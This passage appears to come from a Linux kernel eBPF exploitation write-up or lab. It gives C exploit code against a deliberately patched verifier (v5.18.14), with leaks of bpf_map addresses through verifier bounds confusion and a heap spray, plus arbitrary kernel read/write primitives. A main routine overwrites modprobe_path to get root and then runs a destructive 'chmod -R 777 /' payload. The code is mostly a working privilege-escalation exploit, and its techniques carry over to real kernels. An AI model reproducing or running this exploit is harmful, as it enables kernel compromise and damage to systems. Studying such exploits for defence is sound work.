      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  const uint64_t kernel_base = aar64(bpf_map_addr) - BPF_MAP_OPS_OFFSET;
  printf("[+] kernel_base: 0x%016lx\n", kernel_base);

  const char* new_modprobe = "/tmp/evil.sh";
  const size_t new_modprobe_len = strlen(new_modprobe);
  printf("[*] Overwrite modprobe to %s\n", new_modprobe);
  for (size_t i = 0; i < new_modprobe_len; i += 8) {
    aaw64(kernel_base + MODPROB_OFFSET + i, *(uint64_t*)(new_modprobe + i));
  }
  {
    int fd = open("/proc/sys/kernel/modprobe", O_RDONLY);
    if (fd < 0) {
      fatal("open(/proc/sys/kernel/modprobe)");
    }

    char modprobe[0x100];
    read(fd, modprobe, sizeof(modprobe));
    if (strncmp(modprobe, new_modprobe, new_modprobe_len)) {
      printf("[*] new modprobe: %s\n", modprobe);
      puts("[-] Failed to overwrite modprobe");
      return -1;
    }
    puts("[+] Successfully overwritten modprobe");
  }

  puts("[+] Get root");
  system("echo -e '#!/bin/sh\nchmod -R 777 /' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn");

  return 0;
}

Leaks

Leak addr of struct bpf_map using adjust_ptr_min_max_vals

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd = -1;
uint64_t leak_bpf_map_addr() {
  char verifier_log[0x10000];

  uint64_t val = 0;
  bpf_map_update(mapfd, 0, &val);

  struct bpf_insn insns[] = {
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),           // r6 = r0
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0),  // r7 = [r0]
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),           // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  write(socks[1], "Hello", 5);

  bpf_map_lookup(mapfd, 0, &val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}

Leak addr of struct bpf_map using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, 'a', 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    write(socks[1], "Hello", 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
